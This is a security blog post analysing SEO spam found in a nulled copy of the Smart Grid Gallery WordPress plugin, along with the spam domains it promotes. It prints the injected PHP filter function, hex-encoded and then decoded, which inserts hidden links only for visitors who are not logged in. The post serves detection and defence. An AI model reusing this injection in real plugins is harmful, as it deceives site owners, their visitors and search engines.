It’s not unusual to see website owners running things on a budget. Choosing a safe and reliable hosting company, buying a nice domain name, boosting posts on social media, and ranking on search engines — all this costs a lot of money. At the end of the day, some site owners may even choose to cut expenses by installing pirated (or nulled) software on their websites.

Unfortunately, as discussed in some of our earlier posts about free software and fake verification, these “free” components may still come with a hefty price tag. The same people who remove the plugin’s or theme’s license checks may have also added some other form of monetization — and most times, the end result is not desirable.

Injection in Smart Grid Gallery Plugin

This time, we identified malicious code injected within the Smart Grid Gallery plugin. The malicious code, which was found injected into the SmartGridGalleryClass.php file, didn’t even try to be discreet.

Seen below, the injection consisted of two long hex encoded strings and an ironic sorry_function.

if( ! function_exists('sorry_function')){ 
   function sorry_function($content) { 
if (is_user_logged_in()){return $content;} else {if(is_page()||is_single()){ 
   $vNd25 = "74144151x7640163x74x79154145x3d42x70157x73151164x69x6fx6e72141x62x73x6f15416516414573164157160x3a6073154145146x7472557171x3971x701707342x3ex57x61x6ex7440x63162145x61x74x6540163151164x65x3fx20x46x69x6ex6440x3cx61x20x68x7214514675x22x68x74164x7072x2f57x64x6cx77x6f162144x70x72x65163163x2ex63x6fx6d574276x46x7214514540x57x6fx72x64x50162x65163x73x20124x68x65155145x73x3c57x617640x61x6e144x20x70x6c165147x69156x73x2ex3c5714415116676"; 
   $zoyBE = "74x64x69x76x20x73x74171154145x3dx22x70157163x69x74x69x6f156x3a141142163x6f154x75164x65x3bx7415716072x3073x6cx65x6616472x2dx397171x39x70x787342x3e104x69x64x20x79x6f16540x66x69156x6440141x7015340146157162x20x61156144162x6f1511447740x59x6fx75x20x63x61156x20146x69x6ex6440156145167407414140150162145146x3dx22150x74x741601637257x2fx64154x61156x64x72157151x6462x3456x63x6f155x2f42x3ex46x72145x6540x41x6ex64x7215715114440107141x6d145x7374x2fx617640x61156x64x20x61160x70163x2e74x2fx64x69x7676"; 
   $fullcontent = $vNd25 . $content . $zoyBE; } else { $fullcontent = $content; } return $fullcontent; }} 
add_filter('the_content', 'sorry_function');} 

Hidden Divs Boost SEO Rankings

Once decoded, the real intention becomes apparent. It adds a hidden div which links to other two websites — probably related to the same person who nulled the plugin — in an attempt to increase their SEO rankings:

<?php 
if (!function_exists('sorry_function')) 
{ 
    function sorry_function($content) 
    { 
        if (is_user_logged_in()) 
        { 
            return $content; 
        } 
        else 
        { 
            if (is_page() || is_single()) 
            { 
               $vNd25 = '"<div style="position:absolute;top:0;left:-9999px;">Want create site? Find <a href="https://securityboulevard.com/2020/12/seo-spam-links-in-nulled-plugins/hxxp://dlwordpress[.]com/">Free WordPress Themes</a> and plugins.</div>"';                 
               $zoyBE = '"<div style="position:absolute;top:0;left:-9999px;">Did you find apk for android? You can find new <a href="https://securityboulevard.com/2020/12/seo-spam-links-in-nulled-plugins/hxxps://dlandroid24[.]com/">Free Android Games</a> and apps.</div>"'; 

Evasive Maneuvers & Sources

This injection leverages a WordPress function called add_filter which “allows plugins to modify various types of internal data at runtime.”

In this case, the malicious code combines the site’s valid content with two hidden divs. To avoid detection, specific conditions must be met to add the divs to the site: When there are no users are logged in to the website, only then can the malicious injection be added into pages or posts.

Upon further investigation, we identified that the installed plugin was a nulled version and had been downloaded from the free themes website hxxps://www[.]downloadfreethemes[.]co/smart-grid-gallery-v1-4-0-responsive-wordpress-gallery-plugin/. We were able to download the same plugin with the same injection, however, there is no reference to this site in the code.

Now, regarding the websites referenced in the malicious injection —  dlwordpress[.]com and dlandroid24[.]com — they are clearly fake sites used to increase SEO rankings and make money on referral programs for other websites. Using PublicWWW during the writing of this article, dlwordpress was injected on 7,040 sites and dlandroid24 was found on 6,262 sites. Majestic identified dlwordpress on 5,000 sites, which is the limit for our account there.

Examining dlwordpress[.]com

Checking those domains found nestled within malicious injections usually means falling into a blackhole of shady referral sites, but what can I say? It’s fun to dig into them. I chose to highlight dlwordpress because it’s currently more popular, and it seems that it hasn’t changed owners as often as dlandroid24.

When accessing the website, we’re welcomed by a post written by Vitaly Ray claiming that they are the one of the world’s largest providers of WordPress themes, plugins, and even tutorials — even though the only link actually sends us to Theme Forest.

By the end of the post, you’ll find some links to a gambling website (casinor[.]com, another referral aggregator to several other gambling sites), which sponsors the site.

Referral Source and Aggregator

They added a picture of what seems to be the site owner to the main page — perhaps it’s Vitaly Ray. However, a quick image search on Google images returns a picture of Ruaridh Currie, so probably this “Vitaly Ray” person isn’t actually  a real person at all.

Google image search result

The advertisement page, which seems to be the second most important page of the website, indicates that they offer ad services: “If you’d like to advertise, please contact us below. Advertising slots are currently $2,500 per year.”

In conclusion, site owners should always avoid installing nulled themes/plugins from any source. A large majority of nulled software contains malicious backdoors or SEO spam injections, which can pose serious security risks to your website’s visitors and environment. You can also audit existing plugins to make sure any nulled software has not been installed on the WordPress environment.